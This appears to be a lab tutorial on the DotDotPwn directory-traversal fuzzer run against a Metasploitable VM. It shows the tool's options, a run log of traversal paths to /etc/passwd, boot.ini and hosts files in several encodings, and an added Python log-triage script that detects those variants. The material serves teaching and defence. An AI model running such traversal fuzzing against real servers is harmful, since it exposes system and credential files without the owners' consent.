Reminder:

Note: in this article the tool is used for research and learning. This type of tool must not be used against a server that does not belong to you; doing so can be punished by law (see articles 323-XX).

Test environment:

For this we will use a VM running the Kali distribution and a Metasploitable Server VM (the target), a deliberately vulnerable server intended for demos.

Here is a diagram:
[diagram: Kali VM and Metasploitable VM (target)]

DotDotPwn

Kali ships DotDotPwn by default. The supported fuzzing modules are:

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload
  • STDOUT

Usage

Options

root@kali:~# dotdotpwn.pl
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v3.0 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
 Available options:
 -m    Module [http | http-url | ftp | tftp | payload | stdout]
 -h    Hostname
 -O    Operating System detection for intelligent fuzzing (nmap)
 -o    Operating System type if known ("windows", "unix" or "generic")
 -s    Service version detection (banner grabber)
 -d    Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
 -f    Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
 -E    Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
 -S    Use SSL - for HTTP and Payload module (use https:// for in url for http-uri)
 -u    URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
 -k    Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
 -p   Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
 -x    Port to connect (default: HTTP=80; FTP=21; TFTP=69)
 -t    Time in milliseconds between each test (default: 300 (.3 second))
 -X    Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
 -e    File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
 -U    Username (default: 'anonymous')
 -P    Password (default: 'dot@dot.pwn')
 -M    HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
 -r    Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
 -b    Break after the first vulnerability is found
 -q    Quiet mode (doesn't print each attempt)
 -C    Continue if no data was received from host

Example with the HTTP module

Running the script against our Metasploitable server over HTTP.

root@kali:~# dotdotpwn.pl -m http -h 192.168.5.11 -M GET
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v3.0 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

[+] Report name: Reports/192.168.5.11_03-27-2016_21-23.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.5.11
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cissue
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cboot.ini
[*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
--SNiP--
[*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fpasswd <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fissue <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252fboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fpasswd <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fissue <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
^C
[+] Total Traversals found: 160
[-] Fuzz testing aborted
[+] Report saved: Reports/192.168.5.11_03-27-2016_21-23.txt

We can see that the script fuzzes the same patterns while trying different encodings.
Because we did not specify the OS (option -o unix in our case), it tests the Windows, Unix, ... patterns.
I would just add one reservation about the results marked VULNERABLE: it only means that the server returned an HTTP 200 status code, which depends on the web server's configuration.
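The requests in the run above are the same traversal in several encodings (plain ../, %5C backslashes, %252f double encoding with the .? dot variant), and as noted a 200 on its own is not proof of a leak. The following log-triage script is an added example, not part of the original article or of DotDotPwn: it percent-decodes request targets until stable so these variants collapse to the same shape, flags them, and groups attempts by source IP whatever the status code. The access-log lines are constructed, not from a real server.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines mirroring the request targets seen in the
# DotDotPwn run above (paths only; IPs, timestamps and byte counts are made up).
SAMPLE_LOG = """\
192.168.5.10 - - [27/Mar/2016:21:23:01 +0200] "GET /../etc/passwd HTTP/1.1" 400 226
192.168.5.10 - - [27/Mar/2016:21:23:02 +0200] "GET /..%5C..%5Cetc%5Cpasswd HTTP/1.1" 404 289
192.168.5.10 - - [27/Mar/2016:21:23:03 +0200] "GET /.?%252f.?%252fetc%252fpasswd HTTP/1.1" 200 1744
192.168.5.10 - - [27/Mar/2016:21:23:04 +0200] "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.1" 404 289
192.168.5.20 - - [27/Mar/2016:21:23:05 +0200] "GET /index.php?x=1 HTTP/1.1" 200 9421
192.168.5.20 - - [27/Mar/2016:21:23:06 +0200] "GET /files/report.v2.pdf HTTP/1.1" 200 40211
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# A segment made only of dots and '?' (the tool's dot variants: '..', '.?', '??', ...).
DOT_SEGMENT = re.compile(r'^[.?]{2,}$')

def normalize(target, max_rounds=3):
    """Percent-decode until the string stops changing (catches %252f double
    encoding), then fold backslashes to slashes so %5C variants look like '../'."""
    prev = None
    for _ in range(max_rounds):
        if target == prev:
            break
        prev, target = target, unquote(target)
    return target.replace("\\", "/")

def is_traversal_attempt(target):
    """True when any normalized segment looks like a parent-directory step.
    The whole request target (path and query) is examined: '.?%252f...' contains
    a '?', so a server sees '/.' plus a query string and may answer 200 for the
    index page, which is exactly why a 200 alone proves nothing."""
    return any(DOT_SEGMENT.match(seg) for seg in normalize(target).split("/"))

def scan(log_text):
    """Return {source_ip: [(raw_target, status), ...]} for flagged requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m["target"]):
            hits.setdefault(m["ip"], []).append((m["target"], int(m["status"])))
    return hits

if __name__ == "__main__":
    for ip, attempts in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(attempts)} traversal attempts, statuses {[s for _, s in attempts]}")
```

Because every variant is flagged before status is considered, the 400 and 404 responses from the first encodings are as useful for spotting the fuzzer as the 200 that DotDotPwn labels VULNERABLE.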

Bonus:

In the file /usr/share/dotdotpwn/DotDotPwn/TraversalEngine.pm you will find the files the fuzzer looks for (so it is possible to add more) and the encodings used for slashes and dots.
The same directory contains the code of the different modules.

Media: presentation at BlackHat by nitrØus and chr1x

Explanation by example, by wireghoul